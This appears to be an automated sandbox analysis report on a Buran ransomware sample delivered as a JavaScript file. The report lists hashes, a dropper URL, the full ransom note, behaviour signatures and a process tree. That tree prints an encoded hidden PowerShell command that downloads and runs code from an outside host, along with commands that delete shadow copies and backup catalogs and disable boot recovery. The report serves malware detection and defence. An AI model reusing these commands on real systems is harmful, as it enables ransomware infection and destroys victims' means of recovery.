Analysis

  • max time kernel
    155s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    31-08-2021 20:17

General

  • Target

    5613.js

  • Size

    137KB

  • MD5

    220af76150e7b8e51b12c322002d36db

  • SHA1

    b5befee69c32ecaa162808192f3c0f42cde731cd

  • SHA256

    924b39a646b7ba75fff348033897597b52f1a81af1830beeb279dca1556bd39b

  • SHA512

    d540686c0415d11be1bd65e1f55313ee0e0a7bd543eda231188daee9a39aa5c2471b19e730b74a397d5d5826e7c9ee21e86f2168b696c7ff8e5a8b7a261b2328

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Reserved email: [email protected] Your personal ID: 287-562-BB8 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\5613.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:580
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3460
        • C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe
          "C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3996
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Suspicious use of WriteProcessMemory
            PID:2116
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1864
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3504
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              6⤵
                PID:2208
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                  PID:516
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                  6⤵
                    PID:3356
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2288
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2132
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      7⤵
                      • Interacts with shadow copies
                      PID:1916
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
                    6⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:1088
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:908
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      7⤵
                      • Interacts with shadow copies
                      PID:2532
                • C:\Windows\SysWOW64\notepad.exe
                  notepad.exe
                  5⤵
                    PID:752
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2108

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

            MD5

            bc382383b6c90d20dba3f58aa0f40ade

            SHA1

            b626e4d049d88702236910b302c955eecc8c7d5f

            SHA256

            bf25937b534e738f02e5ec01592dd9a72d79e67bc32f3a5e157a0608f5bbd117

            SHA512

            651e85acf56ec7bffdc10941ba3bcebea5aede44d479e4db5d61160de2b975c484499a95564adaf90f350d6a1bf3aa97774019f1464045114cbb97806fc76c2f

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

            MD5

            a2981517afbb3ebe48d2168b07274f47

            SHA1

            78e0fa382ca97436ec5c43209a2e391b41d356ab

            SHA256

            f5ef795d1577213ce930034afc93387232cc95dfe53db40db0ed65fbb44bcfae

            SHA512

            4e939a2270036ebf0eaec96ba231eb38cb4e2389064a30e5f3b9e5e5581d363ab934431e69978e015f25f3352d17e3b3242d02357aa034838a94912fa8d6ba15

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

            MD5

            0465994d32988b4ff5811340c4905188

            SHA1

            7b4043cbd9509bc78b08863ad22b720632686785

            SHA256

            b33b95c79ca7fc2da4e43282f29ec14db42bdafd53c8888de793cea52caa20bb

            SHA512

            04654263a6391c84e0fd230a992dbd107f905599a066d124055591ce19a9d74b61627bb9d4dc9df89f396b12f795b649f0331e4aad39304a5ad0e0bccc36ad43

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

            MD5

            38707060aa653b4de91172285fbcad3b

            SHA1

            f9aebdece980fd4efe2ffe196b2970b4376ef6ad

            SHA256

            94d739c3e32e375275cdd7b810f6ea2baba0785472578cf8149003450542a9bd

            SHA512

            25abb6e4bb303bcf2fbcd36d6e1691d1c09a8df0e8590f3c331a6103925f58c85eac8e341b5090a30d8c4650f4e39a18b1ed9f023c37b524bcf6eaf7e950c6e3

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

            MD5

            1b5b899dcf7ad220aaa7a8298b4c417d

            SHA1

            f1aa88c4d23a67fed98b258c12c4706b2c20265e

            SHA256

            5c6deafbf16adfbeab9a3193cd0269e073e57fdddb5549ff72ae455266c0981f

            SHA512

            9c4fd9e6e8cdf34b398af2322da17f3334111171a760ffbf9fd51962c80a0cab04a01bc553ddc5689b803aadf58fdfde9237a68878e8055b349a7c3853f2e850

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

            MD5

            ead5fbd9779ab136d037f684e1b95df0

            SHA1

            04129e6b8fc961ca5660eeb2d9b49a78fe0ea2d1

            SHA256

            6f5419e415287ec72314175ca705666ef4919883d137c383a9d658b26e55c156

            SHA512

            0db04fac158ec5c6d1923fe84c43856653b2312e90e44b15fd48126594cd5b891b7b6b54549f46f81235316d7fd287526fe5aff35e5a96cfe796e6e20cd4bbca

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\9N444H22.htm

            MD5

            b1cd7c031debba3a5c77b39b6791c1a7

            SHA1

            e5d91e14e9c685b06f00e550d9e189deb2075f76

            SHA256

            57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

            SHA512

            d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\9DGVTZJK.htm

            MD5

            8615e70875c2cc0b9db16027b9adf11d

            SHA1

            4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

            SHA256

            da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

            SHA512

            cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

          • C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe

            MD5

            dcef208fcdac3345c6899a478d16980f

            SHA1

            fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

            SHA256

            824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

            SHA512

            28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

          • C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe

            MD5

            dcef208fcdac3345c6899a478d16980f

            SHA1

            fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

            SHA256

            824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

            SHA512

            28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

          • C:\Users\Admin\AppData\Local\Temp\~temp001.bat

            MD5

            ef572e2c7b1bbd57654b36e8dcfdc37a

            SHA1

            b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

            SHA256

            e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

            SHA512

            b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

            MD5

            dcef208fcdac3345c6899a478d16980f

            SHA1

            fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

            SHA256

            824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

            SHA512

            28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

            MD5

            dcef208fcdac3345c6899a478d16980f

            SHA1

            fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

            SHA256

            824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

            SHA512

            28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

            MD5

            dcef208fcdac3345c6899a478d16980f

            SHA1

            fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

            SHA256

            824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

            SHA512

            28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

          • memory/516-164-0x0000000000000000-mapping.dmp

          • memory/752-161-0x0000000001020000-0x0000000001021000-memory.dmp

            Filesize

            4KB

          • memory/752-151-0x0000000000000000-mapping.dmp

          • memory/908-166-0x0000000000000000-mapping.dmp

          • memory/1088-168-0x0000000000000000-mapping.dmp

          • memory/1088-174-0x0000000000E00000-0x0000000000F45000-memory.dmp

            Filesize

            1.3MB

          • memory/1864-162-0x0000000000000000-mapping.dmp

          • memory/1916-175-0x0000000000000000-mapping.dmp

          • memory/2116-148-0x0000000000000000-mapping.dmp

          • memory/2116-154-0x0000000000C00000-0x0000000000D45000-memory.dmp

            Filesize

            1.3MB

          • memory/2132-173-0x0000000000000000-mapping.dmp

          • memory/2208-163-0x0000000000000000-mapping.dmp

          • memory/2288-167-0x0000000000000000-mapping.dmp

          • memory/2532-171-0x0000000000000000-mapping.dmp

          • memory/3356-165-0x0000000000000000-mapping.dmp

          • memory/3460-133-0x000001E26B216000-0x000001E26B218000-memory.dmp

            Filesize

            8KB

          • memory/3460-127-0x000001E26B210000-0x000001E26B212000-memory.dmp

            Filesize

            8KB

          • memory/3460-126-0x000001E26BCB0000-0x000001E26BCB1000-memory.dmp

            Filesize

            4KB

          • memory/3460-121-0x000001E26B130000-0x000001E26B131000-memory.dmp

            Filesize

            4KB

          • memory/3460-115-0x0000000000000000-mapping.dmp

          • memory/3460-128-0x000001E26B213000-0x000001E26B215000-memory.dmp

            Filesize

            8KB

          • memory/3504-172-0x0000000000000000-mapping.dmp

          • memory/3948-114-0x0000000000000000-mapping.dmp

          • memory/3996-142-0x0000000000000000-mapping.dmp

          • memory/3996-146-0x0000000000B70000-0x0000000000CB5000-memory.dmp

            Filesize

            1.3MB

          • memory/3996-147-0x0000000000400000-0x0000000000557000-memory.dmp

            Filesize

            1.3MB